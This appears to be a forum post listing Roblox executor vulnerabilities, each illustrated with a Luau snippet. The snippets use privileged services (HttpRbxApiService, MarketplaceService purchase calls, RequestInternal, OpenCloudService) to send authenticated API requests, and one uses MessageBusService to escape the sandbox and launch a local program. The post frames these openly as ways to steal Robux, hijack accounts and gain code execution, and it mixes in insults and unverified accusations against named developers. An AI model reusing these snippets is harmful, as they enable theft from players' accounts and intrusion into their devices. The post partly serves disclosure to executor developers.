Author: https://github.com/fissurectomy Telegram: https://t.me/fissurectomy Discord: fissurectomy
This will include every way possible to abuse a Roblox Executor to cookie log accounts, steal robux, or even achieve Remote Code Execution.
I found all these vulnerabilities while testing the security of mobile executors and I found them in under an hour. I wanted to show just how shit of a developer rexidtc is. Rexi contributed to most mobile executors (Codex, Hydrogen, Delta and more.)
I recommend you to avoid using the executors that I have mentioned above. Rexidtc was the owner of KittenMilk, which was known to be a malicious executor in the past. In the other hand, Furky, the owner of Codex, was suspected by the exploiting community to be using the user's device to mine cryptocurrency, resulting in a significant performance decrease. Oh and, a funny fact about Furky is that he once tried to argue that DLLs existed on mobile, and it shows how much of a script kiddie he is.
If you're on PC and use bluestacks to exploit, I recommend buying Electron. If you're on mobile, I recommend getting Fluxus.
You can abuse the HttpRbxApiService Service of Roblox that is normally only accessible by CoreScripts but since Executors have the thread level of 8, you have the permissions to use the service!
The LuaU code below will send an account authenticated request to the Roblox API to grab the amount of robux that the user has, and this can be also abused to steal robux, account and etc.
local robux = game:GetService("HttpRbxApiService"):GetAsyncFullUrl("https://economy.roblox.com/v1/user/currency")
print(robux)Roblox's BrowserService was again, only meant to be accessed by CoreScripts. Using this service will open up a ton of critical vulnerabilities, such as cookie grabbing, auto downloading malicious files, executing JavaScript that may potentially be malicious, and more.
The code below uses the service to open a google url.
game:GetService("BrowserService"):OpenBrowserWindow('https://google.com')Just like HttpRbxApiService, this can be abused to send authenticated requests to the Roblox API.
The code below uses the service to open a google url. Oh, just realized, the BrowserService and GuiService function to open a url is the same!
game:GetService("GuiService"):OpenBrowserWindow('https://google.com/')The service MarketplaceService has alot of functions that can be used to steal a Roblox Account's Robux.
The code below shows all the functions that are used to steal an account's robux.
local m = game:GetService("MarketplaceService")
-- gets the account's balance and prints it
local r = m:GetRobuxBalance()
print(r)
-- below can be used to steal robux
-- if you wish to see the function's required parameters, check the docs: https://robloxapi.github.io/ref/class/MarketplaceService.html
m:PerformPurchase()
m:PerformPurchaseV2()
m:PromptNativePurchaseWithLocalPlayer()
m:PromptNativePurchase()
m:PromptCollectiblesPurchase()
m:PromptGamePassPurchase()
m:PromptBundlePurchase()
m:PromptThirdPartyPurchase()
m:PromptRobloxPurchase()
m:PromptProductPurchase()
m:PromptPurchase()
-- in the docs, there are also signals that could be potentially fired by an executor's firesignal function. if you have already done blocking the other functions above in your executor, consider blocking firesignal from firing those malicious signals.You've probably already tried sending requests to the Roblox API with HttpService at one point, and it throws the error "HttpService can't access ROBLOX resources."
But did you know that there is an unrestricted function in HttpService, allowing you to send authenticated requests to the API, resulting in Robux Stealer Scripts? Introducing: RequestInternal!
game:GetService("HttpService"):RequestInternal({Url = "https://www.google.com/"})OpenCloudService is a new Service added to Roblox, and again, it allowed you to send authenticated requests to the Roblox API.
game:GetService("OpenCloudService"):HttpRequestAsync({
Url = 'https://google.com'
})Credits to James Napora for this one.
We can abuse MessageBusService to access the openUrlRequest messages which lets us escape the sandbox, resulting in an RCE or Remote Code Execution vulnerability.
game:GetService("MessageBusService"):Publish(game:GetService("MessageBusService"):GetMessageId("Linking", "openURLRequest"), {url = "notepad.exe"})In most Roblox loadstring scripts, you might've seen "game:HttpGet" after it. That's the function that sends the GET request to a specific url to grab a script, and loadstring is the one that looks for LuaU code in the url provided.
This can be abused by sending authenticated requests to the Roblox API, resulting in Robux Stealers, Account Stealers and more.
game:HttpGet('REPLACE THIS WITH ROBLOX API URL')The Roblox Unified Naming Convention, aka UNC has a custom function called "request", it's alias can be http_request, http, syn.request and more. And since 99% of executors support UNC, this becomes critical.
This can be abused to send authenticated requests to the Roblox API.
request({
Url = 'https://google.com'
Method = 'GET' -- u can use post
})
-- for POST requests, add the application/json headerCHECK James Napora's Github Gist FOR MORE INFORMATION Basically, this uses ScriptContext to create a CoreScript and parent it to an actor and elevating it's thread identity to 8, allowing you to use the functions above even if they were blocked.
game:GetService("ScriptContext"):AddCoreScriptLocal("CoreScripts/ProximityPrompt", actor)And that was all the critical vulnerabilities! I didn't spent much into finding the vulns, and I'm not wasting time again on it. However, if there's any critical vulnerability you would like me to put here, just contact me and ill add it.
👍Good post